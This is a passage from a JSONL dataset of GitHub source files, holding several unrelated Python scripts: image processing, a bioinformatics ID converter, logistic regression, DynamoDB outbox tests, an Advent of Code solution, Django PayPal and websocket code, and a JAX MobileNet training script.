int(sys.argv[3]))\n","repo_name":"isc-projects/kea-anterius","sub_path":"tests/dhcp_config_gen.py","file_name":"dhcp_config_gen.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"81"} +{"seq_id":"14092788352","text":"# -*- coding: utf-8 -*-\n'''\nTlang_PDownton_1_4_2: Read and show an image.\n'''\nimport PIL.ImageDraw\nimport PIL\nimport matplotlib.pyplot as plt \nimport os.path\nimport numpy as np # “as” lets us use standard abbreviations\nimport matplotlib.colors as pltc\n'''Read the image data'''\n# Get the directory of this python script\ndirectory = os.getcwd()\nnew_directory = os.path.join(directory, 'modified')\ntry:\n os.mkdir(new_directory)\nexcept OSError:\n pass # if the directory already exists, proceed \n# Build an absolute filename from directory + filename\nfilename2 = os.path.join(directory, str(pngimg_com.jpg))\n# Read the image data into an array\nimg = plt.imread(filename2)\nimage = PIL.Image.open(filename2)\nfilename, filetype = filename2.split('.')\nif filetype != 'png':\n new_image_filename = os.path.join(new_directory, filename + '.png')\n image.save(new_image_filename)\n img = plt.imread(os.path.join(directory, filename2 + '.png'))\nheight = len(img)\nwidth = len(img[0])\nfor r in range(height):\n for c in range(width):\n if sum(img[r][c])==765: # brightness R+G+B goes up to 3*255=765\n img[r][c]=(0,0,0,0)\n# Create figure with 2 subplots\nfig, axes = plt.subplots(1,1)\n# Show the image data in the first subplot\naxes.imshow(img, interpolation='none')\n# Show the figure on the screen\nfig.show()\n","repo_name":"PatDown/Pdownton_Tlang","sub_path":"TLang_PDownton_1_4_2.py","file_name":"TLang_PDownton_1_4_2.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7566208218","text":"#! 
python3\n# refseq_prot_nuc_id_switch.py\n# Parses a text file containing RefSeq protein or nucleotide IDs\n# and associates it to its respective nucleotide or protein ID\n# (depending on input)\n\nimport os, argparse\n\n# Define functions for later use\ndef validate_args(args):\n # Validate input file locations\n if not os.path.isfile(args.inputFileName):\n print('I am unable to locate the input text file (' + args.inputFileName + ')')\n print('Make sure you\\'ve typed the file name or location correctly and try again.')\n quit()\n if not os.path.isfile(args.gff3FileName):\n print('I am unable to locate the input gff3 file (' + args.gff3FileName + ')')\n print('Make sure you\\'ve typed the file name or location correctly and try again.')\n quit()\n # Handle file overwrites\n if os.path.isfile(args.outputFileName):\n print(args.outputFileName + ' already exists. Delete/move/rename this file and try again.')\n quit()\n\ndef parse_text_to_list(fileName):\n outputList = []\n with open(fileName, \"r\") as fileIn:\n for line in fileIn:\n outputList.append(line.rstrip('\\r\\n'))\n return outputList\n\ndef parse_refseq_gff3_prot_nuc_ids(fileName):\n GFF3_MRNA_LINE_LEN = 9\n #PREFIX_TO_STRIP = \"rna-\"\n idsDict = {}\n with open(fileName, \"r\") as fileIn:\n for line in fileIn:\n # Make line able to be handled\n sl = line.rstrip('\\r\\n').split('\\t')\n # Skip irrelevant lines\n if len(sl) != GFF3_MRNA_LINE_LEN:\n continue\n # Extract relevant info from CDS lines\n if sl[2] == \"CDS\":\n # Explode details into a dict\n details = sl[8].split(';')\n detail_dict = {}\n for i in range(len(details)):\n if details[i] == '':\n continue\n split_details = details[i].split('=', maxsplit=1)\n detail_dict[split_details[0]] = split_details[1]\n # Obtain nuc and prot IDs\n #nucID = detail_dict[\"Parent\"][len(PREFIX_TO_STRIP):]\n nucID = detail_dict[\"Parent\"]\n protID = detail_dict[\"protein_id\"]\n # Associate IDs in main dict\n idsDict[nucID] = protID\n idsDict[protID] = nucID\n return idsDict\n\n\n##### USER INPUT SECTION\n\nusage = \"\"\"%(prog)s reads a text file listing RefSeq feature IDs, either protein\nor nucleotide, and using the parent .gff file it will switch these ID types around,\nreturning a new text file.\n\"\"\"\np = argparse.ArgumentParser(description=usage)\np.add_argument(\"-i\", dest=\"inputFileName\",\n help=\"Input text file name\")\np.add_argument(\"-g\", dest=\"gff3FileName\",\n help=\"Input gff3 file name\")\np.add_argument(\"-o\", dest=\"outputFileName\",\n help=\"Output text file name\")\np.add_argument(\"--warning\", dest=\"warning\", action='store_true', default=False,\n help=\"Specify if you want the program to warn you when an ID was not found in the gff3\")\n\nargs = p.parse_args()\nvalidate_args(args)\n\n# Parse input text file\nidsList = parse_text_to_list(args.inputFileName)\n\n# Parse input gff3 file\nidsDict = parse_refseq_gff3_prot_nuc_ids(args.gff3FileName)\n\n# Output file with inverted IDs (where possible)\nwith open(args.outputFileName, \"w\") as fileOut:\n for listID in idsList:\n abbrevID = listID.split(\" \")[0] # RefSeq IDs are commonly the first bit before whitespace\n if abbrevID in idsDict:\n fileOut.write(idsDict[abbrevID] + '\\n')\n else:\n try:\n fileOut.write(idsDict[listID] + '\\n')\n except:\n if args.warning:\n print(\"Warning: {0} not found in gff3\".format(listID))\n\n# All done!\nprint('Program completed 
successfully!')\n","repo_name":"zkstewart/Genome_analysis_scripts","sub_path":"gene_annotation_pipeline/gemoma/refseq_prot_nuc_id_switch.py","file_name":"refseq_prot_nuc_id_switch.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"11625566165","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# import seaborn as sns\nfrom sklearn import datasets\nfrom Logistic_Regression import LogisticRegression\n\niris = datasets.load_iris()\n\nX = iris.data[:, :2]\ny = (iris.target != 0) *1\n\nclf = LogisticRegression()\nclf.fit(X,y)\n\npred = clf.predict(X)\n\n\nplt.figure(figsize=(10, 6))\nplt.scatter(X[y == 0][:, 0], X[y == 0][:, 1], color='b', label='0')\nplt.scatter(X[y == 1][:, 0], X[y == 1][:, 1], color='r', label='1')\nplt.legend()\nx1_min, x1_max = X[:,0].min(), X[:,0].max(),\nx2_min, x2_max = X[:,1].min(), X[:,1].max(),\nxx1, xx2 = np.meshgrid(np.linspace(x1_min, x1_max), np.linspace(x2_min, x2_max))\ngrid = np.c_[xx1.ravel(), xx2.ravel()]\nprobs = clf.predict_prob(grid).reshape(xx1.shape)\nplt.contour(xx1, xx2, probs, [0.5], linewidths=1, colors='black')\nplt.show()","repo_name":"shangeth/Logistic_Regression","sub_path":"logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19499206845","text":"import datetime\nimport json\nimport uuid\n\nimport pytest\nfrom unit_of_work.dynamodb import DynamoDBSession\n\nfrom tests.events import OrderCreatedEvent, UnknownOrderEvent\nfrom transactional_messaging.dynamodb import DynamoDBOutboxRepository\nfrom transactional_messaging.dynamodb.outbox import MessageNotFoundError, UnknownTopicError\nfrom transactional_messaging.outbox import MessageAlreadyPublishedError\nfrom transactional_messaging.utils.time import utcnow\n\npytestmark = pytest.mark.usefixtures(\"_create_outbox_table\", \"_reset_moto_container_on_teardown\")\n\n\n@pytest.fixture()\ndef repo(session: DynamoDBSession) -> DynamoDBOutboxRepository:\n TOPIC_MAP = {OrderCreatedEvent: \"order--created\"}\n return DynamoDBOutboxRepository(table_name=\"orders-outbox\", session=session, topic_map=TOPIC_MAP)\n\n\n@pytest.mark.asyncio()\nasync def test_publish_message(repo: DynamoDBOutboxRepository, session: DynamoDBSession) -> None:\n event = OrderCreatedEvent(order_id=uuid.uuid4())\n\n await repo.publish([event])\n await session.commit()\n\n published_message = await repo.get(message_id=event.event_id)\n assert published_message\n assert published_message.message_id == event.event_id\n assert published_message.correlation_id == event.correlation_id\n assert published_message.aggregate_id == event.order_id\n assert published_message.topic == \"order--created\"\n assert json.loads(published_message.message) == event.to_dict()\n assert published_message.created_at == event.created_at\n assert published_message.approximate_dispatch_count == 0\n assert published_message.is_dispatched is False\n assert published_message.last_dispatched_at is None\n\n\n@pytest.mark.asyncio()\nasync def test_message_already_published(repo: DynamoDBOutboxRepository, session: DynamoDBSession) -> None:\n event = OrderCreatedEvent(order_id=uuid.uuid4())\n await repo.publish([event])\n await session.commit()\n\n await repo.publish([event])\n with pytest.raises(MessageAlreadyPublishedError, match=str(event.event_id)):\n await 
session.commit()\n\n\n@pytest.mark.asyncio()\nasync def test_unknown_message_topic_raises(repo: DynamoDBOutboxRepository) -> None:\n event = UnknownOrderEvent(order_id=uuid.uuid4()) # Not present in TOPIC_MAP\n\n with pytest.raises(UnknownTopicError, match=\"UnknownOrderEvent\"):\n await repo.publish([event])\n\n\n@pytest.mark.asyncio()\nasync def test_mark_as_dispatched_not_existing_message_raises(repo: DynamoDBOutboxRepository) -> None:\n message_id = uuid.uuid4()\n\n with pytest.raises(MessageNotFoundError, match=str(message_id)):\n await repo.mark_as_dispatched(message_id=message_id)\n\n\n@pytest.mark.asyncio()\nasync def test_mark_as_dispatched(repo: DynamoDBOutboxRepository, session: DynamoDBSession) -> None:\n event = OrderCreatedEvent(order_id=uuid.uuid4())\n await repo.publish([event])\n await session.commit()\n\n await repo.mark_as_dispatched(message_id=event.event_id)\n\n published_message = await repo.get(message_id=event.event_id)\n assert published_message\n assert published_message.approximate_dispatch_count == 1\n assert published_message.is_dispatched is True\n assert published_message.last_dispatched_at\n assert datetime.timedelta(seconds=1) > utcnow() - published_message.last_dispatched_at\n\n\n@pytest.mark.asyncio()\nasync def test_mark_as_dispatched_twice(repo: DynamoDBOutboxRepository, session: DynamoDBSession) -> None:\n event = OrderCreatedEvent(order_id=uuid.uuid4())\n await repo.publish([event])\n await session.commit()\n\n await repo.mark_as_dispatched(message_id=event.event_id)\n await repo.mark_as_dispatched(message_id=event.event_id)\n\n published_message = await repo.get(message_id=event.event_id)\n assert published_message\n assert published_message.approximate_dispatch_count == 2\n\n\n@pytest.mark.asyncio()\nasync def test_get_not_dispatched_messages__oldest_message_first(\n repo: DynamoDBOutboxRepository, session: DynamoDBSession\n) -> None:\n event_1 = OrderCreatedEvent(order_id=uuid.uuid4(), created_at=datetime.datetime(2023, 1, 1))\n event_2 = OrderCreatedEvent(order_id=uuid.uuid4(), created_at=datetime.datetime(2021, 1, 1))\n event_3 = OrderCreatedEvent(order_id=uuid.uuid4(), created_at=datetime.datetime(2022, 1, 1))\n event_4 = OrderCreatedEvent(order_id=uuid.uuid4()) # Dispatched\n\n await repo.publish([event_1, event_2, event_3, event_4])\n await session.commit()\n await repo.mark_as_dispatched(message_id=event_4.event_id)\n await session.commit()\n\n not_dispatched_messages = await repo.get_not_dispatched_messages()\n assert len(not_dispatched_messages) == 3\n assert not_dispatched_messages[0] == await repo.get(message_id=event_2.event_id)\n assert not_dispatched_messages[1] == await repo.get(message_id=event_3.event_id)\n assert not_dispatched_messages[2] == await repo.get(message_id=event_1.event_id)\n\n\n@pytest.mark.asyncio()\nasync def test_dispatched_message_removed_from_not_dispatched_messages_collection(\n repo: DynamoDBOutboxRepository, session: DynamoDBSession\n) -> None:\n event_1 = OrderCreatedEvent(order_id=uuid.uuid4())\n event_2 = OrderCreatedEvent(order_id=uuid.uuid4())\n await repo.publish([event_1, event_2])\n await session.commit()\n\n await repo.mark_as_dispatched(message_id=event_1.event_id)\n\n not_dispatched_messages = await repo.get_not_dispatched_messages()\n assert len(not_dispatched_messages) == 1\n assert not_dispatched_messages[0] == await 
repo.get(message_id=event_2.event_id)\n","repo_name":"filipsnastins/transactional-messaging-patterns-with-aws-dynamodb-streams-sns-sqs-lambda","sub_path":"library-transactional-messaging/tests/test_dynamodb_outbox_repository.py","file_name":"test_dynamodb_outbox_repository.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"31301331674","text":"\"\"\"\n--- Day 1: No Time for a Taxicab ---\n\nSanta's sleigh uses a very high-precision clock to guide its movements, and the clock's oscillator is regulated by stars. Unfortunately, the stars have been stolen... by the Easter Bunny. To save Christmas, Santa needs you to retrieve all fifty stars by December 25th.\n\nCollect stars by solving puzzles. Two puzzles will be made available on each day in the advent calendar; the second puzzle is unlocked when you complete the first. Each puzzle grants one star. Good luck!\n\nYou're airdropped near Easter Bunny Headquarters in a city somewhere. \"Near\", unfortunately, is as close as you can get - the instructions on the Easter Bunny Recruiting Document the Elves intercepted start here, and nobody had time to work them out further.\n\nThe Document indicates that you should start at the given coordinates (where you just landed) and face North. Then, follow the provided sequence: either turn left (L) or right (R) 90 degrees, then walk forward the given number of blocks, ending at a new intersection.\n\nThere's no time to follow such ridiculous instructions on foot, though, so you take a moment and work out the destination. Given that you can only walk on the street grid of the city, how far is the shortest path to the destination?\n\nFor example:\n\nFollowing R2, L3 leaves you 2 blocks East and 3 blocks North, or 5 blocks away.\nR2, R2, R2 leaves you 2 blocks due South of your starting position, which is 2 blocks away.\nR5, L5, R5, R3 leaves you 12 blocks away.\nHow many blocks away is Easter Bunny HQ?\n\n--- Part Two ---\n\nThen, you notice the instructions continue on the back of the Recruiting Document. 
Easter Bunny HQ is actually at the first location you visit twice.\n\nFor example, if your instructions are R8, R4, R4, R8, the first location you visit twice is 4 blocks away, due East.\n\nHow many blocks away is the first location you visit twice?\n\nYour puzzle answer was 182.\n\n\"\"\"\n\n\n\ndirections = \"R3, L5, R1, R2, L5, R2, R3, L2, L5, R5, L4, L3, R5, L1, R3, R4, R1, L3, R3, L2, L5, L2, R4, R5, R5, L4, L3, L3, R4, R4, R5, L5, L3, R2, R2, L3, L4, L5, R1, R3, L3, R2, L3, R5, L194, L2, L5, R2, R1, R1, L1, L5, L4, R4, R2, R2, L4, L1, R2, R53, R3, L5, R72, R2, L5, R3, L4, R187, L4, L5, L2, R1, R3, R5, L4, L4, R2, R5, L5, L4, L3, R5, L2, R1, R1, R4, L1, R2, L3, R5, L4, R2, L3, R1, L4, R4, L1, L2, R3, L1, L1, R4, R3, L4, R2, R5, L2, L3, L3, L1, R3, R5, R2, R3, R1, R2, L1, L4, L5, L2, R4, R5, L2, R4, R4, L3, R2, R1, L4, R3, L3, L4, L3, L1, R3, L2, R2, L4, L4, L5, R3, R5, R3, L2, R5, L2, L1, L5, L1, R2, R4, L5, R2, L4, L5, L4, L5, L2, L5, L4, R5, R3, R2, R2, L3, R3, L2, L5\"\n\n\ndef get_direction(direction, steps, facing):\n if direction == 'R':\n # turn right\n facing += 1\n else:\n # turn left\n facing -= 1\n\n # make sure facing cardinal directions loops back\n # Cardinal directions = ['N', 'R', 'D', 'L']\n if facing > 3: facing = 0\n if facing < 0: facing = 3\n\n x, y = (0, 0)\n\n if facing == 0:\n x, y = 0, steps\n elif facing == 1:\n x, y = steps, 0\n elif facing == 2:\n x, y = 0, -steps\n else:\n x, y = -steps, 0\n\n return (x, y, facing)\n\ndef blocks_away(directions):\n start = (0, 0)\n facing = 0\n\n for coord in directions.split(','):\n coord = coord.strip()\n direction = coord[:1]\n steps = coord[1:]\n x, y, facing = get_direction(direction, int(steps), facing)\n start = (start[0] + x, start[1] + y)\n\n return abs(start[0]) + abs(start[1])\n\ndef blocks_away_first(directions):\n start = (0, 0)\n facing = 0\n routes = set()\n for coord in directions.split(','):\n coord = coord.strip()\n direction = coord[:1]\n steps = coord[1:]\n x, y, facing = get_direction(direction, int(steps), facing)\n\n # Generate path walked from prev position to new position\n x_step = 1 if x >= 0 else -1\n y_step = 1 if y >= 0 else -1\n if x != 0:\n path = [(x_, start[1]) for x_ in range(start[0], start[0] + x, x_step)]\n else:\n path = [(start[0], y_) for y_ in range(start[1], start[1] + y, y_step)]\n \n # Add path to our routes set, if encountered, then we have our twice visited location\n for p in path:\n if p in routes:\n return abs(p[0]) + abs(p[1])\n else:\n routes.add(p)\n\n start = (start[0] + x, start[1] + y)\n\n# Part 1 Answer\nprint (blocks_away(directions))\n# Part 2 Answer\nprint (blocks_away_first(directions))\n","repo_name":"alex-red/advent_of_code_2016","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29849100204","text":"from decimal import Decimal\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render, get_object_or_404\nfrom paypal.standard.forms import PayPalPaymentsForm\nfrom newapp.models import UserProfileInfo\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n@csrf_exempt\ndef payment_done(request):\n return render(request, 'payment/done.html')\n\n\n@csrf_exempt\ndef payment_canceled(request):\n return render(request, 'payment/canceled.html')\n\n\n\ndef payment_process(request):\n # order_id = request.session.get('order_id')\n # print(order_id)\n # order = 
get_object_or_404(UserProfileInfo, id=order_id)\n # #userprofile = UserProfileInfo.objects.get(user=request.user)\n # print(order)\n # print(order.id)\n # amount = order.amount\n # print(amount)\n host = request.get_host()\n # print(host)\n\n paypal_dict = {\n 'business': settings.PAYPAL_RECEIVER_EMAIL,\n 'amount': '100000',\n 'item_name': 'test',\n 'invoice': 'test_payment',\n 'currency_code': 'USD',\n 'notify_url': 'http://{}{}'.format(host, reverse('paypal-ipn')),\n 'return_url': 'http://{}{}'.format(host, reverse('payment:done')),\n 'cancel_return': 'http://{}{}'.format(host, reverse('payment:canceled')),\n }\n form = PayPalPaymentsForm(initial=paypal_dict)\n context= {'form':form}\n return render(request, 'payment/process.html', context)\n","repo_name":"javacode56/jai-mahaveer-foundation","sub_path":"jaimahavir/newproj/payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42626664936","text":"import concurrent.futures\nimport re\n\nimport clearbit\nfrom channels.generic.websocket import WebsocketConsumer\nfrom django.conf import settings\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework_jwt.serializers import VerifyJSONWebTokenSerializer, jwt_get_username_from_payload\n\nfrom socialuser.models import User\n\n\nclass UserInfoConsumer(WebsocketConsumer):\n consumers = {}\n\n def connect(self):\n self.user = None\n self.accept()\n\n def receive(self, *, text_data):\n m = re.match(r'^/auth (.*)$', text_data)\n if not m:\n self.send(text_data=\"error: syntax\")\n return\n\n token = m[1]\n try:\n # TODO: Report bug of djangorestframework-jwt==1.11.0 - it tries to User.objects.get_by_natural_key(username) for wrong user model.\n # user_info = VerifyJSONWebTokenSerializer().validate({'token': token})\n payload = VerifyJSONWebTokenSerializer()._check_payload(token=token)\n username = jwt_get_username_from_payload(payload)\n self.remove_self() # possibly switch to different socialuser\n self.user = User.objects.get(username=username)\n except (ValidationError, User.DoesNotExist) as e:\n self.send(text_data=\"error: cannot authenticate\" + str(e))\n else:\n if not self.user.pk in UserInfoConsumer.consumers:\n UserInfoConsumer.consumers[self.user.pk] = set()\n UserInfoConsumer.consumers[self.user.pk].add(self)\n self.send(text_data=\"ok: user_id={}\".format(self.user.pk))\n\n def disconnect(self, message):\n self.remove_self()\n if self.user and not UserInfoConsumer.consumers[self.user.pk]:\n del UserInfoConsumer.consumers[self.user.pk]\n\n def remove_self(self):\n if self.user:\n UserInfoConsumer.consumers[self.user.pk].remove(self)\n\n @staticmethod\n def notify_user_info_received(user_pk, success):\n if not user_pk in UserInfoConsumer.consumers:\n return\n for consumer in UserInfoConsumer.consumers[user_pk]:\n consumer.send(\"notice: socialuser data received\" if success else \"error: cannot receive socialuser data\")\n\n\n_executor = concurrent.futures.ThreadPoolExecutor(max_workers=settings.MAX_RETRIEVE_DATA_EXECUTORS)\n\ndef fill_user_data_automatically(user):\n # Thread(target=do_fill_user_data_automatically, args=(user,)).start()\n _executor.submit(do_fill_user_data_automatically, user)\n\n\ndef do_fill_user_data_automatically(user):\n if settings.SKIP_EXTERNAL_CALLS:\n return\n\n person = clearbit.Person.find(email=user.email, stream=True)\n # Don't handle errors in details, because error messages may probably contain private 
information.\n if person == None:\n UserInfoConsumer.notify_user_info_received(user.pk, success=False)\n return\n\n # My interpretation of \"additional information\" in the tech specification:\n if not user.first_name:\n user.first_name = person['name']['givenName'] or \"\"\n if not user.last_name:\n user.last_name = person['name']['familyName'] or \"\"\n # ignore person['name']['fullName']\n if not user.location:\n user.location = person['location'] or \"\"\n if not user.city:\n user.city = person['geo']['city'] or \"\"\n if not user.state:\n user.state = person['geo']['state'] or \"\"\n if not user.country:\n user.country = person['geo']['country'] or \"\"\n if user.lat is None:\n user.lat = person['geo']['lat'] or None\n if user.lng is None:\n user.lng = person['geo']['lng'] or None\n if not user.bio:\n user.bio = person['bio'] or \"\"\n # Handle exceptions be sure for the case if ClearBit's concept of URL is not the same as ours:\n if not user.site:\n try:\n user.site = person['site'] or \"\"\n except ValidationError:\n pass\n if not user.avatar:\n try:\n user.avatar = person['avatar'] or \"\"\n except ValidationError:\n pass\n\n user.save()\n UserInfoConsumer.notify_user_info_received(user.pk, success=True)\n","repo_name":"vporton/avatrade-job-test","sub_path":"socialuser/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29363843036","text":"import os\n# Note: To maintain the default precision as 32-bit and not switch to 64-bit, set the following flag prior to any\n# imports of JAX. This is necessary as the jax_enable_x64 flag is later set to True inside the Lanczos algorithm.\n# See: https://github.com/google/jax/issues/8178\nos.environ['JAX_DEFAULT_DTYPE_BITS'] = '32'\n\nimport csv\nimport numpy as np\nfrom timeit import default_timer as timer\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n\nimport tensorflow as tf\nimport torch\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport optax\nimport jax\nimport jax.numpy as jnp\nfrom jax import random, value_and_grad, jit\nfrom jax.lib import xla_bridge\nimport haiku as hk\nfrom haiku.nets import MobileNetV1\n\nfrom experiments.dnn.dnn_test_utils import start_test, get_config, write_config_to_file, get_optimizer\n\nprint(jax.local_devices())\nprint(xla_bridge.get_backend().platform)\ntf.config.experimental.set_visible_devices([], \"GPU\")\n\n\nclass AudiosetDataset(data.Dataset):\n\n def __init__(self, annotations_file_csv='./audioset_dataset/index.csv', img_dir='./audioset_dataset/train_jpg',\n transform=transforms.Compose([transforms.ToTensor()])):\n super().__init__()\n df = pd.read_csv(annotations_file_csv, converters={\n \"labels_as_indices\": lambda x: np.array(x.strip(\"[]\").replace(\"'\", \"\").split(\", \")).astype(int)})\n self.df_data = df.values\n self.data_dir = img_dir\n self.transform = transform\n self.num_classes = 527\n\n def __len__(self):\n return len(self.df_data)\n\n def __getitem__(self, index):\n img_name, label = self.df_data[index]\n img_path = os.path.join(self.data_dir, img_name)\n image = plt.imread(img_path)\n if self.transform is not None:\n image = self.transform(np.array(image))\n target = torch.zeros(self.num_classes)\n target[label] = 1.\n return image, target\n\n\ndef train_mobilenet(optimizer_name):\n\n def sigmoid_cross_entropy(logits, labels):\n \"\"\" Computes sigmoid cross entropy given logits and multiple 
class labels. \"\"\"\n logits = logits.astype(jnp.float32)\n log_p = jax.nn.log_sigmoid(logits)\n log_not_p = jax.nn.log_sigmoid(-logits)\n loss = -labels * log_p - (1. - labels) * log_not_p\n return jnp.asarray(loss)\n\n @jit\n def loss_fn(params, batch_data, state):\n \"\"\" Implements cross-entropy loss function.\n\n Args:\n params: Parameters of the network\n batch_data: A batch of data (images and labels)\n Returns:\n Loss calculated for the current batch\n \"\"\"\n inputs, targets = batch_data\n preds, state = model.apply(params, state, None, inputs, is_training=True)\n return sigmoid_cross_entropy(logits=preds, labels=targets).mean(), state\n\n def calculate_accuracy(params, batch_data, state):\n \"\"\" Implements accuracy metric.\n\n Args:\n params: Parameters of the network\n batch_data: A batch of data (images and labels)\n Returns:\n Accuracy for the current batch\n \"\"\"\n inputs, targets = batch_data\n preds, _ = model.apply(params, state, None, inputs, is_training=False)\n predicted_class = jnp.argmax(preds, axis=1)\n indexes = (jnp.array(jnp.arange(0, targets.shape[0])), predicted_class)\n target_class = targets[indexes]\n return jnp.mean(target_class)\n\n @jit\n def inference(params, batch_data, state):\n \"\"\" Implements train step.\n\n Args:\n opt_state: Current state of the optimizer\n batch_data: A batch of data (images and labels)\n Returns:\n Batch loss, batch accuracy\n \"\"\"\n batch_loss, _ = loss_fn(params, batch_data, state)\n batch_accuracy = calculate_accuracy(params, batch_data, state)\n return batch_loss, batch_accuracy\n\n @jit\n def train_step(opt_state, params, batch_data, state):\n \"\"\" Implements train step.\n\n Args:\n step: Integer representing the step index\n opt_state: Current state of the optimizer\n batch_data: A batch of data (images and labels)\n Returns:\n Batch loss, batch accuracy, updated optimizer state\n \"\"\"\n (batch_loss, state), batch_gradients = value_and_grad(loss_fn, has_aux=True)(params, batch_data, state)\n batch_accuracy = calculate_accuracy(params, batch_data, state)\n\n deltas, opt_state = optimizer.update(batch_gradients, opt_state, params)\n params = optax.apply_updates(params, deltas)\n\n return batch_loss, batch_accuracy, opt_state, params, state\n\n np.random.seed(1234)\n\n batch_size = 256\n\n trainset = AudiosetDataset(annotations_file_csv='./audioset_dataset/index_train.csv', img_dir='./audioset_dataset/train_jpg')\n train_ds = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=4, drop_last=True)\n\n validset = AudiosetDataset(annotations_file_csv='./audioset_dataset/index_valid.csv', img_dir='./audioset_dataset/valid_jpg')\n val_ds = torch.utils.data.DataLoader(validset, batch_size=batch_size, shuffle=False, num_workers=4, drop_last=True)\n\n num_train_batches = len(train_ds)\n num_valid_batches = len(val_ds)\n\n print(\"num_train_batches:\", num_train_batches, \"num_valid_batches:\", num_valid_batches)\n\n learning_rate = 1e-1 if 'momentum' in optimizer_name else 1e-3\n conf = get_config(optimizer=optimizer_name, approx_k=10, batch_size=batch_size, learning_rate=learning_rate,\n num_iterations_between_ese=800, approx_l=0, alpha=0.01, num_warmup_iterations=num_train_batches)\n test_folder = start_test(conf[\"optimizer\"], test_folder='test_results_mobilenet_audioset')\n write_config_to_file(test_folder, conf)\n\n def _model(images, is_training):\n net = MobileNetV1(num_classes=527)\n return net(images, is_training)\n\n model = hk.transform_with_state(_model)\n\n # We have 
defined our model. We need to initialize the params based on the input shape.\n batch = next(iter(train_ds))\n batch = (jnp.array(batch[0], jnp.float32), jnp.array(batch[1], jnp.int32))\n x = jnp.asarray(batch[0][0], dtype=jnp.float32)\n x = jnp.expand_dims(x, axis=0)\n net_params, state = model.init(random.PRNGKey(111), x, is_training=True)\n\n loss_f = lambda params, batch: loss_fn(params, batch, state)[0]\n optimizer = get_optimizer(conf, loss_f, batch, b_call_ese_internally=False)\n opt_state = optimizer.init(net_params)\n\n ############################### Training ###############################\n\n train_stats_file = test_folder + \"/train_stats.csv\"\n with open(train_stats_file, 'w') as f:\n writer = csv.writer(f)\n writer.writerow([\"epoch\", \"train_loss\", \"train_acc\", \"val_loss\", \"val_acc\", \"latency\", \"wall_time\"])\n\n start_time = 1e10\n for i in range(conf[\"num_epochs\"]):\n if i == 1:\n start_time = timer()\n\n # Lists to store loss and accuracy for each batch\n train_batch_loss, train_batch_acc = [], []\n valid_batch_loss, valid_batch_acc = [], []\n iteration_latency = []\n\n print(f\"Epoch: {i:<3}\", end=\" \")\n epoch_start = timer()\n\n # Training\n for step, batch_data in enumerate(train_ds):\n bd = (jnp.array(batch_data[0], jnp.float32), jnp.array(batch_data[1], jnp.int32))\n iteration_start = timer()\n if \"fosi\" in optimizer_name and max(1, (i * num_train_batches + step) + 1 - conf[\"num_warmup_iterations\"]) % conf[\"num_iterations_between_ese\"] == 0:\n opt_state = optimizer.update_ese(net_params, opt_state)\n loss_value, acc, opt_state, net_params, state = train_step(opt_state, net_params, bd, state)\n iteration_end = timer()\n\n train_batch_loss.append(loss_value)\n train_batch_acc.append(acc)\n iteration_latency.append(iteration_end - iteration_start)\n\n epoch_end = timer()\n\n # Evaluation on validation data every 5 epochs\n if i % 5 == 0:\n for batch_data in val_ds:\n bd = (jnp.array(batch_data[0], jnp.float32), jnp.array(batch_data[1], jnp.int32))\n loss_value, acc = inference(net_params, bd, state)\n valid_batch_loss.append(loss_value)\n valid_batch_acc.append(acc)\n\n # Loss for the current epoch\n epoch_valid_loss = np.mean(valid_batch_loss)\n # Accuracy for the current epoch\n epoch_valid_acc = np.mean(valid_batch_acc)\n\n # Loss for the current epoch\n epoch_train_loss = np.mean(train_batch_loss)\n\n # Accuracy for the current epoch\n epoch_train_acc = np.mean(train_batch_acc)\n\n print(f\"loss: {epoch_train_loss:.3f} acc: {epoch_train_acc:.3f} valid_loss: {epoch_valid_loss:.3f} valid_acc: {epoch_valid_acc:.3f} latency: {epoch_end - epoch_start}\")\n with open(train_stats_file, 'a') as f:\n writer = csv.writer(f)\n writer.writerow(\n [i, epoch_train_loss, epoch_train_acc, epoch_valid_loss, epoch_valid_acc, epoch_end - epoch_start,\n np.maximum(0, timer() - start_time)])\n\n\nif __name__ == \"__main__\":\n for optimizer_name in ['fosi_adam', 'fosi_momentum', 'adam', 'momentum']:\n train_mobilenet(optimizer_name)\n","repo_name":"hsivan/fosi","sub_path":"experiments/dnn/mobilenet_audioset.py","file_name":"mobilenet_audioset.py","file_ext":"py","file_size_in_byte":9437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"15075246378","text":"import logging\n\nfrom flask import Blueprint, render_template, request\n\n\nfrom loader.utils import get_new_post, load_json_data\n\nfrom config import POST_PATH, UPLOAD_FOLDER\n\nfrom my_logger import logger\n\n\nloader_blueprint = 
